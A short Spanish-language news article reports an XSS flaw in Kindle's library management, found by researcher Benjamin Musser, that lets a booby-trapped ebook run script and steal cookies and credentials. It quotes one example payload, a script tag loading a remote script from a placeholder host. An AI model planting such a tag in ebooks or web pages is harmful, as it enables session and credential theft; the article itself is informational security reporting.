Web Analytics
Conecta con nosotros

Noticias

Fallo de seguridad en Kindle permite ejecutar código oculto en los ebooks

Publicado el

Amzon Kindle

Un investigador ha descubierto un fallo de seguridad en Kindle, que puede ser fácilmente aprovechado introduciendo código oculto en los ebooks.

Un agujero de seguridad está en la administración de Kindle y permite ejecutar código malicioso. El usuario solo tiene que actualizar su biblioteca con un libro corrupto para que este fallo pueda ser aprovechado, así que hay que tener cuidado con el lugar de donde se obtienen los libros.

Una simple etiqueta como la que se ve abajo es suficiente para aprovechar el fallo de seguridad, haciendo referencia a un script XSS que está alojado en un servidor. A través de ahí el hacker puede acceder a las cookies del usuario y en consecuencia a sus credenciales.

<script src="https://www.example.org/script.js"></script>

Según Benjamin Musser, investigador que ha descubierto el fallo de seguridad en Kindle, ha publicado al final de su artículo que este problema lleva desde octubre de 2013. En un principio fue parcheado rápidamente por Amazon, pero parece que ha habido una regresión tras unos cambios en la administración de Kindle.

Apasionado del software en general y de Linux en particular. El Open Source, la multiplataforma y la seguridad son mis especialidades.

Lo más leído